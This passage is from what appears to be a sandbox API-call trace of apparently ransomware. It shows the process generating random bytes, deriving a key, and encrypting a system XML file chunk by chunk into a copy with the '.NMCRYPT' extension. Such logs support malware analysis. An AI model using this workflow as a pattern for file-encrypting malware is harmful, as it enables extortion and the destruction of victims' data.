hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.988] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.989] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.990] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.991] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.991] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.991] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.991] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.991] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.991] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.991] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.991] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.991] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.991] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.991] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.991] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.991] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.991] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.991] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.991] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.991] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.991] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0156.991] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0156.992] CryptCreateHash (in: hProv=0x8e3908, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44492c | out: phHash=0x1d44492c) returned 1 [0156.992] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7dd10, dwDataLen=0x100, dwFlags=0x0) returned 1 [0156.992] CryptDeriveKey (in: hProv=0x8e3908, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d444930 | out: phKey=0x1d444930*=0x9ad338) returned 1 [0156.992] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x1, pbData=0x2d7de10, dwFlags=0x0) returned 1 [0156.992] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x4, pbData=0x2d7dcc0*=0x1, dwFlags=0x0) returned 1 [0156.992] wcslen (_String="\\\\?\\") returned 0x4 [0156.992] CryptDuplicateKey (in: hKey=0x9ad338, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7dc94 | out: phKey=0x2d7dc94*=0x9ad5f8) returned 1 [0156.992] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0156.992] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0156.992] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7dc84 | out: lpFileSize=0x2d7dc84*=804) returned 1 [0156.992] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7dc7c*=0x200, lpOverlapped=0x0) returned 1 [0156.993] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.994] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.994] GetLastError () returned 0x0 [0156.994] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.039] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.039] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.039] GetLastError () returned 0x0 [0157.039] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.039] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.039] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.039] GetLastError () returned 0x0 [0157.039] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.039] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x24, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x24, lpOverlapped=0x0) returned 1 [0157.039] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x24, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x30) returned 1 [0157.040] GetLastError () returned 0x0 [0157.040] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x30, lpOverlapped=0x0) returned 1 [0157.040] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x0, lpOverlapped=0x0) returned 1 [0157.040] WriteFile (in: hFile=0x588, lpBuffer=0x607e18*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesWritten=0x2d7dc7c*=0x0, lpOverlapped=0x0) returned 1 [0157.040] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft 